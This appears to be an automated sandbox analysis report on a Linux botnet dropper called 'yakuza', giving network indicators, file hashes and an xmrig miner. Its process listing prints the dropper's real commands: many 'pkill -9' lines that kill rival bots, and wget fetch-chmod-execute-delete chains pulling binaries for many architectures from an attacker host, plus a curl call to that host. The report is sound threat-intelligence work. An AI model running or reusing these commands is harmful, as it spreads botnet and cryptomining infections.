[sh -c pkill -9 neb || busybox pkill -9 neb]

/usr/bin/pkill

[pkill -9 neb]

/bin/busybox

[busybox pkill -9 neb]

/bin/sh

[sh -c pkill -9 Akiru || busybox pkill -9 Akiru]

/usr/bin/pkill

[pkill -9 Akiru]

/bin/busybox

[busybox pkill -9 Akiru]

/bin/sh

[sh -c pkill -9 U8inTz || busybox pkill -9 U8inTz]

/usr/bin/pkill

[pkill -9 U8inTz]

/bin/busybox

[busybox pkill -9 U8inTz]

/bin/sh

[sh -c pkill -9 netstats || busybox pkill -9 netstats]

/usr/bin/pkill

[pkill -9 netstats]

/bin/busybox

[busybox pkill -9 netstats]

/bin/sh

[sh -c pkill -9 Alex || busybox pkill -9 Alex]

/usr/bin/pkill

[pkill -9 Alex]

/bin/busybox

[busybox pkill -9 Alex]

/bin/sh

[sh -c pkill -9 W9RCAKM20T || busybox pkill -9 W9RCAKM20T]

/usr/bin/pkill

[pkill -9 W9RCAKM20T]

/bin/busybox

[busybox pkill -9 W9RCAKM20T]

/bin/sh

[sh -c pkill -9 newnetword || busybox pkill -9 newnetword]

/usr/bin/pkill

[pkill -9 newnetword]

/bin/busybox

[busybox pkill -9 newnetword]

/bin/sh

[sh -c pkill -9 Ayo215 || busybox pkill -9 Ayo215]

/usr/bin/pkill

[pkill -9 Ayo215]

/bin/busybox

[busybox pkill -9 Ayo215]

/bin/sh

[sh -c pkill -9 Word || busybox pkill -9 Word]

/usr/bin/pkill

[pkill -9 Word]

/bin/busybox

[busybox pkill -9 Word]

/bin/sh

[sh -c pkill -9 nloads || busybox pkill -9 nloads]

/usr/bin/pkill

[pkill -9 nloads]

/bin/busybox

[busybox pkill -9 nloads]

/bin/sh

[sh -c pkill -9 BAdAsV || busybox pkill -9 BAdAsV]

/usr/bin/pkill

[pkill -9 BAdAsV]

/bin/busybox

[busybox pkill -9 BAdAsV]

/bin/sh

[sh -c pkill -9 Wordmane || busybox pkill -9 Wordmane]

/usr/bin/pkill

[pkill -9 Wordmane]

/bin/busybox

[busybox pkill -9 Wordmane]

/bin/sh

[sh -c pkill -9 notyakuzaa || busybox pkill -9 notyakuzaa]

/usr/bin/pkill

[pkill -9 notyakuzaa]

/bin/busybox

[busybox pkill -9 notyakuzaa]

/bin/sh

[sh -c pkill -9 Belch || busybox pkill -9 Belch]

/usr/bin/pkill

[pkill -9 Belch]

/bin/busybox

[busybox pkill -9 Belch]

/bin/sh

[sh -c pkill -9 Wordnets || busybox pkill -9 Wordnets]

/usr/bin/pkill

[pkill -9 Wordnets]

/bin/busybox

[busybox pkill -9 Wordnets]

/bin/sh

[sh -c pkill -9 obp || busybox pkill -9 obp]

/usr/bin/pkill

[pkill -9 obp]

/bin/busybox

[busybox pkill -9 obp]

/bin/sh

[sh -c pkill -9 BigN0gg0r420 || busybox pkill -9 BigN0gg0r420]

/usr/bin/pkill

[pkill -9 BigN0gg0r420]

/bin/busybox

[busybox pkill -9 BigN0gg0r420]

/bin/sh

[sh -c pkill -9 X0102I34f || busybox pkill -9 X0102I34f]

/usr/bin/pkill

[pkill -9 X0102I34f]

/bin/busybox

[busybox pkill -9 X0102I34f]

/bin/sh

[sh -c pkill -9 ofhasfhiafhoi || busybox pkill -9 ofhasfhiafhoi]

/usr/bin/pkill

[pkill -9 ofhasfhiafhoi]

/bin/busybox

[busybox pkill -9 ofhasfhiafhoi]

/bin/sh

[sh -c pkill -9 BzSxLxBxeY || busybox pkill -9 BzSxLxBxeY]

/usr/bin/pkill

[pkill -9 BzSxLxBxeY]

/bin/busybox

[busybox pkill -9 BzSxLxBxeY]

/bin/sh

[sh -c pkill -9 X19I239124UIU || busybox pkill -9 X19I239124UIU]

/usr/bin/pkill

[pkill -9 X19I239124UIU]

/bin/busybox

[busybox pkill -9 X19I239124UIU]

/bin/sh

[sh -c pkill -9 oism || busybox pkill -9 oism]

/usr/bin/pkill

[pkill -9 oism]

/bin/busybox

[busybox pkill -9 oism]

/bin/sh

[sh -c pkill -9 Deported || busybox pkill -9 Deported]

/usr/bin/pkill

[pkill -9 Deported]

/bin/busybox

[busybox pkill -9 Deported]

/bin/sh

[sh -c pkill -9 XSHJEHHEIIHWO || busybox pkill -9 XSHJEHHEIIHWO]

/usr/bin/pkill

[pkill -9 XSHJEHHEIIHWO]

/bin/busybox

[busybox pkill -9 XSHJEHHEIIHWO]

/bin/sh

[sh -c pkill -9 olsVNwo12 || busybox pkill -9 olsVNwo12]

/usr/bin/pkill

[pkill -9 olsVNwo12]

/bin/busybox

[busybox pkill -9 olsVNwo12]

/bin/sh

[sh -c pkill -9 DeportedDeported || busybox pkill -9 DeportedDeported]

/usr/bin/pkill

[pkill -9 DeportedDeported]

/bin/busybox

[busybox pkill -9 DeportedDeported]

/bin/sh

[sh -c pkill -9 XkTer0GbA1 || busybox pkill -9 XkTer0GbA1]

/usr/bin/pkill

[pkill -9 XkTer0GbA1]

/bin/busybox

[busybox pkill -9 XkTer0GbA1]

/bin/sh

[sh -c pkill -9 onry0v03 || busybox pkill -9 onry0v03]

/usr/bin/pkill

[pkill -9 onry0v03]

/bin/busybox

[busybox pkill -9 onry0v03]

/bin/sh

[sh -c pkill -9 FortniteDownLOLZ || busybox pkill -9 FortniteDownLOLZ]

/usr/bin/pkill

[pkill -9 FortniteDownLOLZ]

/bin/busybox

[busybox pkill -9 FortniteDownLOLZ]

/bin/sh

[sh -c pkill -9 Y0urM0mGay || busybox pkill -9 Y0urM0mGay]

/usr/bin/pkill

[pkill -9 Y0urM0mGay]

/bin/busybox

[busybox pkill -9 Y0urM0mGay]

/bin/sh

[sh -c pkill -9 pussyfartlmaojk || busybox pkill -9 pussyfartlmaojk]

/usr/bin/pkill

[pkill -9 pussyfartlmaojk]

/bin/busybox

[busybox pkill -9 pussyfartlmaojk]

Network

Country Destination Domain Proto
US 1.1.1.1:53 linux-it.abuser.eu udp
IT 95.234.158.87:80 linux-it.abuser.eu tcp
IT 95.234.158.87:6780 linux-it.abuser.eu tcp
IT 95.234.158.87:21 linux-it.abuser.eu tcp
IT 95.234.158.87:7108 linux-it.abuser.eu tcp

Files

/tmp/yakuza.mips

MD5 371732a722f576ce663cf832412521a8
SHA1 7d8f25bfc26af545c568ffc5c0afe8c4cd35de40
SHA256 11bd15eeca11f8fcb46cce41f4387505027446b5ba8774d2b7bd759bcdb1b9d0
SHA512 c2174eeaf058a5d78d2bb7e417373c56d5b407072de68aaae33c690fd14b93a033ef4aeb18f9a364541e51b6cfc0a28c93efbb4a1857a15b875d420e9886c014

/tmp/xmrig

MD5 8f4fff0ded94f1141768220906abfbb8
SHA1 ea7c97294f415dc8713ac8c280b3123da62f6e56
SHA256 b0e1ae6d73d656b203514f498b59cbcf29f067edf6fbd3803a3de7d21960848d
SHA512 0096072a1482f8e7999867baa3dd6e96d51591e9f7645c9ff276b53984957025c83e1fe52e5c4f55639eeed2bdbd80bbd57d7dacd84468ce09c834e39dfc4bee

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-24 02:41

Reported

2024-11-24 02:43

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

149s

Max time network

129s

Command Line

[/tmp/ca0bd413a34399accc6f62506ac94f9c7e1fd5c4efa49d1627eed568b1de78bf.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /tmp/yakuza.mips N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /tmp/yakuza.mipsel N/A
N/A N/A /bin/rm N/A

Processes

/tmp/ca0bd413a34399accc6f62506ac94f9c7e1fd5c4efa49d1627eed568b1de78bf.sh

[/tmp/ca0bd413a34399accc6f62506ac94f9c7e1fd5c4efa49d1627eed568b1de78bf.sh]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.mips]

/bin/chmod

[chmod +x yakuza.mips]

/tmp/yakuza.mips

[./yakuza.mips]

/bin/rm

[rm -rf yakuza.mips]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.mipsel]

/bin/chmod

[chmod +x yakuza.mipsel]

/tmp/yakuza.mipsel

[./yakuza.mipsel]

/bin/rm

[rm -rf yakuza.mipsel]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.sh]

/bin/chmod

[chmod +x yakuza.sh]

/tmp/yakuza.sh

[./yakuza.sh]

/bin/rm

[rm -rf yakuza.sh]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.x86]

/bin/chmod

[chmod +x yakuza.x86]

/tmp/yakuza.x86

[./yakuza.x86]

/bin/rm

[rm -rf yakuza.x86]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.arm6]

/bin/chmod

[chmod +x yakuza.arm6]

/tmp/yakuza.arm6

[./yakuza.arm6]

/bin/rm

[rm -rf yakuza.arm6]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.i686]

/bin/chmod

[chmod +x yakuza.i686]

/tmp/yakuza.i686

[./yakuza.i686]

/bin/rm

[rm -rf yakuza.i686]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.ppc]

/bin/chmod

[chmod +x yakuza.ppc]

/tmp/yakuza.ppc

[./yakuza.ppc]

/bin/rm

[rm -rf yakuza.ppc]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.i586]

/bin/chmod

[chmod +x yakuza.i586]

/tmp/yakuza.i586

[./yakuza.i586]

/bin/rm

[rm -rf yakuza.i586]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.m68k]

/bin/chmod

[chmod +x yakuza.m68k]

/tmp/yakuza.m68k

[./yakuza.m68k]

/bin/rm

[rm -rf yakuza.m68k]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.arm4]

/bin/chmod

[chmod +x yakuza.arm4]

/tmp/yakuza.arm4

[./yakuza.arm4]

/bin/rm

[rm -rf yakuza.arm4]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.arm5]

/bin/chmod

[chmod +x yakuza.arm5]

/tmp/yakuza.arm5

[./yakuza.arm5]

/bin/rm

[rm -rf yakuza.arm5]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.arm7]

/bin/chmod

[chmod +x yakuza.arm7]

/tmp/yakuza.arm7

[./yakuza.arm7]

/bin/rm

[rm -rf yakuza.arm7]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.sparc]

/bin/chmod

[chmod +x yakuza.sparc]

/tmp/yakuza.sparc

[./yakuza.sparc]

/bin/rm

[rm -rf yakuza.sparc]

/bin/bash

[bash]

/usr/bin/curl

[curl -s http://linux-it.abuser.eu/test.php]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
US 1.1.1.1:53 linux-it.abuser.eu udp
US 151.101.1.91:443 tcp
GB 185.125.188.62:443 tcp
GB 89.187.167.9:443 tcp

Files

N/A